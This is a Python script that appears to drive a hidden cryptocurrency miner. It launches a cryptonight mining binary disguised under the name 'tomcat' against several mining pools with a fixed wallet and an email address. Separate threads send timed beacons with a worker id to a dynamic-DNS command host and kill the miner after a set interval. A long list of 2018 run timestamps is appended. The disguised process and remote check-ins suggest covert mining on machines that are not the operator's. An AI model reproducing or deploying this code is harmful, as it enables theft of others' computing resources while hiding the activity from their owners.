import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:35:01.906701
#2018-02-17 16:20:07.594551
#2018-02-17 18:08:07.590684
#2018-02-17 19:56:04.631317
#2018-02-17 21:44:07.264196
#2018-02-17 23:28:07.384513
#2018-02-18 01:18:04.547629
#2018-02-18 03:05:06.887811
#2018-02-18 04:53:03.461039
#2018-02-18 06:43:07.634700
#2018-02-18 08:33:06.237542
#2018-02-18 10:21:01.798692
#2018-02-18 12:07:04.585695
#2018-02-18 13:52:05.073670
#2018-02-18 15:41:07.503241
#2018-02-18 17:31:06.730874
#2018-02-18 19:18:01.237052
#2018-02-18 21:05:01.318901
#2018-02-18 22:51:03.306036
#2018-02-19 00:39:05.012131
#2018-02-19 02:24:04.495340
#2018-02-19 04:11:04.375357
#2018-02-19 05:55:03.097026
#2018-02-19 07:43:08.492756
#2018-02-19 09:33:05.048916
#2018-02-19 11:23:07.487739
#2018-02-19 13:10:07.013573
#2018-02-19 14:58:05.751185
#2018-02-19 16:47:06.125859
#2018-02-19 18:33:04.378998
#2018-02-19 20:21:01.374757
#2018-02-19 22:10:09.862954
#2018-02-19 23:55:07.373419
#2018-02-20 01:42:06.839898
#2018-02-20 03:31:01.636196
#2018-02-20 05:18:06.283800
#2018-02-20 07:01:08.028278
#2018-02-20 08:47:06.924161
#2018-02-20 10:31:10.355394
#2018-02-20 12:16:04.958151
#2018-02-20 14:05:06.777575
#2018-02-20 15:50:12.840256
#2018-02-20 17:38:07.392520
#2018-02-20 19:28:02.061455
#2018-02-20 21:16:07.645034
#2018-02-20 23:00:10.242009
#2018-02-21 00:44:08.576065
#2018-02-21 02:30:01.631983
#2018-02-21 04:17:05.598540
#2018-02-21 06:03:09.189439
#2018-02-21 07:49:06.709642
#2018-02-21 09:35:10.066561
#2018-02-21 11:24:04.307109
#2018-02-21 13:13:01.588867
#2018-02-21 14:58:13.221573
#2018-02-21 16:46:11.037425
#2018-02-21 18:37:06.202207
#2018-02-21 20:22:05.621762
#2018-02-21 22:11:06.684119
#2018-02-21 23:59:07.294290
#2018-02-22 01:47:07.903287
#2018-02-22 03:34:07.894660
#2018-02-22 05:21:05.315726
#2018-02-22 07:05:07.768570
#2018-02-22 08:52:02.078901
#2018-02-22 10:40:06.679306
#2018-02-22 12:28:05.747388
#2018-02-22 14:14:07.725117
#2018-02-22 16:03:08.668321
#2018-02-22 17:48:11.649243
#2018-02-22 19:34:09.062623
#2018-02-22 21:27:04.375646
#2018-02-22 23:13:04.461614
#2018-02-23 00:58:03.641636
#2018-02-23 02:47:01.799785
#2018-02-23 04:32:05.444177
#2018-02-23 06:18:06.857191
#2018-02-23 08:04:05.047754
#2018-02-23 10:21:05.680555
#2018-02-23 12:16:01.756975
#2018-02-23 14:06:06.401716
#2018-02-23 15:56:01.543442
#2018-02-23 17:41:05.715170
#2018-02-23 19:27:08.575556
#2018-02-23 21:12:01.864759
#2018-02-23 22:59:05.867621
#2018-02-24 00:46:03.487675
#2018-02-24 02:34:01.308156
#2018-02-24 04:27:06.818479
#2018-02-24 06:13:01.387601
#2018-02-24 08:01:01.834098
#2018-02-24 09:46:06.845978
#2018-02-24 11:42:05.248509
#2018-02-24 13:33:03.439942
#2018-02-24 15:20:01.366799
#2018-02-24 17:09:01.686404
#2018-02-24 19:00:01.762092
#2018-02-24 20:47:07.960943
#2018-02-25 01:16:07.488328
#2018-02-25 05:13:04.405122
#2018-02-25 10:56:01.929975